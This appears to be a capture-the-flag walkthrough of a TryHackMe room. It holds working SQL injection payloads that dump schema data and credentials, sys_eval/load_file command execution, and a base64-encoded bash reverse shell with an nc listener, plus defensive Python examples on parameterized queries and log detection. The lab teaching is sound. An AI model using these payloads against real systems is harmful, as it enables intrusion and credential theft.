# TryHack3M: Sch3Ma D3Mon

**Room Link:** <https://tryhackme.com/r/room/sch3mad3mon>

## A Public Computer with a VPN

Go to Edit -> Preferences -> Protocols -> search for SSL or TLS -> select the ssl-key.log file and hit Enter to decrypt the web traffic.

<figure><img src="/files/o47RaJyS8kiLbmgwcn8X" alt=""><figcaption></figcaption></figure>

**Filter**

```
http contains "Username"
```

<figure><img src="/files/qiQzJBjiO3p81nHmuzpV" alt=""><figcaption></figcaption></figure>

## Connected Tables

**Filter**

```
' union select 1,2,3,4,5 -- //
```

### Find Database

**Filter**

```
' union select 1,2,3,4,database() -- //
```

<figure><img src="/files/emOxs50OGEXAylaPw8VJ" alt=""><figcaption></figcaption></figure>

### Find Tables

**Filter**

```
' union select 1,2,3,4,group_concat(table_name) from information_schema.tables WHERE table_schema = 'mayh3Mmarketplace'; -- //
```

<figure><img src="/files/C1Zx7dbUUbVwDkKgcAqv" alt=""><figcaption></figcaption></figure>

### Get fields

**Filter**

```
' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name='users' -- //
```

<figure><img src="/files/XEQshpGFWsjkzUg43ifp" alt=""><figcaption></figcaption></figure>

### Get field info

Confirmed we're the only other user.

**Filter**

```
' union select 1,group_concat(username),group_concat(password),3,4 FROM users -- -
```

<figure><img src="/files/ohyQTHdlCzegsLbCzUDx" alt=""><figcaption></figcaption></figure>

**Filter**

```
' union select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name='unlisted_products' -- //
```

<figure><img src="/files/0hFPqI6CvB0by3yXEpx2" alt=""><figcaption></figcaption></figure>

**Filter**

```
' union select null,null,null,null, group_concat(product_name) from unlisted_products -- //
```

<figure><img src="/files/MJ19qTZtEuBqV5KygXdS" alt=""><figcaption></figcaption></figure>
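The queries in this section only work because the application splices the `user` value straight into its SQL text. As an added example that is not the room's code, here is the same pattern in Python against an in-memory SQLite database (the room uses MySQL; the table and column names below are constructed), showing the walkthrough's credential-dump payload leaking rows from the concatenated query and returning nothing once the value is bound as a parameter.

```python
import sqlite3

# Constructed sample schema mirroring the page's five-column product listing
# and a users table; all data here is made up for this example.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, description TEXT, price REAL, seller TEXT);
        INSERT INTO products VALUES (1, 'widget', 'a widget', 9.99, 'lannister');
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-pw'), (2, 'lannister', 'hash-of-user-pw');
    """)
    return db

# Vulnerable: the user-supplied value is concatenated into the SQL text, so a
# closing quote followed by UNION appends attacker-chosen rows to the result.
def search_vulnerable(db, name):
    sql = f"SELECT id, name, description, price, seller FROM products WHERE name = '{name}'"
    return db.execute(sql).fetchall()

# Hardened: the value is bound as a parameter; the engine never parses it as SQL,
# so the whole payload is compared against the name column and matches nothing.
def search_safe(db, name):
    sql = "SELECT id, name, description, price, seller FROM products WHERE name = ?"
    return db.execute(sql, (name,)).fetchall()

# The UNION payload the walkthrough used against the users table.
PAYLOAD = "' union select 1,group_concat(username),group_concat(password),3,4 FROM users -- -"

def demo():
    """Run the payload through both versions and return (leaked_rows, safe_rows)."""
    db = build_db()
    return search_vulnerable(db, PAYLOAD), search_safe(db, PAYLOAD)

if __name__ == "__main__":
    leaked, safe = demo()
    print("concatenated query returned:", leaked)   # one row of usernames/passwords
    print("parameterized query returned:", safe)    # []
```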

## From DB to OS

**URL**

```
http://10.10.26.7:8000/os_sqli.php?user=lannister' union SELECT null, null, null, null, sys_eval('whoami') -- //
```

<figure><img src="/files/0ECqLfnQy2pPQZ078m5G" alt=""><figcaption></figcaption></figure>

**URL**

```
http://10.10.26.7:8000/os_sqli.php?user=lannister%27%20union%20SELECT%20null,%20null,%20null,%20null,%20sys_eval(%27pwd%27)%20--%20//
```

<figure><img src="/files/7curWNmVvZQOUddDEMmk" alt=""><figcaption></figcaption></figure>

## Finding a Needle in a Malwarestack

We can see the files, but if we `cat` them the output gets cut off.

**URL**

```
http://10.10.61.64:8000/os_sqli.php?user=lannister%27%20union%20SELECT%20null,%20null,%20null,%20null,%20sys_eval(%27ls%20%20/home/receipts%27)%20--%20//
```

<figure><img src="/files/su1D8MioXWobnGNHLFEM" alt=""><figcaption></figcaption></figure>

**URL**

```
' union select null,null,null,column_name,null from information_schema.columns where table_name='transactions' -- // 
```

<figure><img src="/files/iM8C0fAqDPuZn64O6b8G" alt=""><figcaption></figcaption></figure>

**URL**

```
' union select null,null,null,null,group_concat(transaction_number, '::', bcoin_sender_address, '::', bcoin_recipient_address,'\n') from transactions -- //
```

<figure><img src="/files/FmZgXf4K5DsoGPgpfn5B" alt=""><figcaption></figcaption></figure>

**URL**

```
' union select null,null,null,sys_exec('touch /var/lib/mysql/my_file.txt'),null -- //
' union select null,null,null,sys_eval('ls -al /home/receipts/ > /var/lib/mysql/my_file.txt'),null -- //
' union select null,null,null,load_file('/var/lib/mysql/my_file.txt'),null -- // verify that our command was able to load the file

' union select null,null,null,load_file('/home/receipts/3000000.txt.gpg'),null -- //
```

<figure><img src="/files/EA4Fb06NNMDHnQSLhxAA" alt=""><figcaption></figcaption></figure>

If you use Burp, the output will be easier to copy over.

<figure><img src="/files/8aOpdTKUqFl9oFX4oizj" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/5grGjRRPL7exi7oWufJl" alt=""><figcaption></figcaption></figure>

**Kali**

```
gpg --decrypt 3000000.txt.gpg
Passphrase: eqFN5vBg4n2t4xGsJF7BYNWMtTaVA1muES
```

<figure><img src="/files/geplM9IESu6Z8GFqs3Ef" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/OnJfq4Uv9YKIxUCYMBU6" alt=""><figcaption></figcaption></figure>
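The UNION enumeration, `sys_eval` calls and `load_file` reads used in the sections above all leave distinctive traces in the web server's access log. As an added example (not from the room or the walkthrough), the following Python triages constructed Apache-style log lines shaped like the walkthrough's requests; the client IPs, timestamps and signature names are made up, and the decoder handles the double-encoded variant that a single `unquote` would miss.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the injection stages seen in this walkthrough: UNION-based
# row injection, information_schema enumeration, and the MySQL UDF / file
# functions that turn an injection into command execution or file access.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?\bselect\b"),
    "schema_enum": re.compile(r"\binformation_schema\s*\."),
    "group_concat": re.compile(r"\bgroup_concat\s*\("),
    "udf_exec": re.compile(r"\bsys_(?:eval|exec)\s*\("),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+(?:out|dump)file\b"),
}

def normalize(query_string, rounds=3):
    """URL-decode repeatedly (double encoding is common), lower-case and
    collapse whitespace so the patterns above match reliably."""
    text = query_string
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return re.sub(r"\s+", " ", text.lower())

def classify(log_line):
    """Return the set of signature names that fire on one access-log line."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP', log_line)
    if not m:
        return set()
    path = m.group(1)
    query = path.split("?", 1)[1] if "?" in path else ""
    text = normalize(query)
    return {name for name, rx in SIGNATURES.items() if rx.search(text)}

# Constructed log lines (not from the page) shaped like the walkthrough's requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /os_sqli.php?user=lannister HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /os_sqli.php?user=lannister%27%20union%20SELECT%20null,null,null,null,group_concat(table_name)%20from%20information_schema.tables%20--%20// HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:31 +0000] "GET /os_sqli.php?user=lannister%27%20union%20SELECT%20null,%20null,%20null,%20null,%20sys_eval(%27whoami%27)%20--%20// HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:10:01:02 +0000] "GET /os_sqli.php?user=%2527%2520union%2520select%2520null,null,null,load_file(%2527/var/lib/mysql/my_file.txt%2527),null%2520--%2520// HTTP/1.1" 200 700',
]

def triage(lines):
    """Map the index of each suspicious line to its fired signatures; benign lines are skipped."""
    return {i: sorted(tags) for i, line in enumerate(lines) if (tags := classify(line))}

if __name__ == "__main__":
    for idx, tags in triage(SAMPLE_LOG).items():
        print(idx, tags)
```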

## Operation Defang

<figure><img src="/files/LM9WffzqmTBjYv5WQMgn" alt=""><figcaption></figcaption></figure>

**Kali**

```
nc -lvnp 9001
```

**URL**

```
http://10.10.61.64:8000/os_sqli.php?user=lannister%27%20union%20SELECT%20null,%20null,%20null,%20null,%20sys_eval(%27echo%20L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2MS4xNDEvOTAwMSAwPiYx%20|%20base64%20-d%20%20|/bin/bash%27)%20--%20//
```

<figure><img src="/files/WBxcEA1Nhcx6exEMVMNY" alt=""><figcaption></figcaption></figure>

**Victim**

```
script -qc /bin/bash /dev/null
ctrl + Z
stty raw -echo;fg
```

**Victim**

```
cd /home/products/malware/4sale/pal4t1n3/MisterMeist3r/2DC6C0
ls 
```

<figure><img src="/files/HjqxZWagICMUbtAOXdD9" alt=""><figcaption></figcaption></figure>

After reading the code, I saw that we can defang it just by changing the config.ini file to debug=true, so we can run the code without having to worry about what will happen.

**Victim**

```
echo "debug=true" > config.ini  
./build.sh 
```

<figure><img src="/files/sYju4CJbLdXRmUlqRkzM" alt=""><figcaption></figcaption></figure>

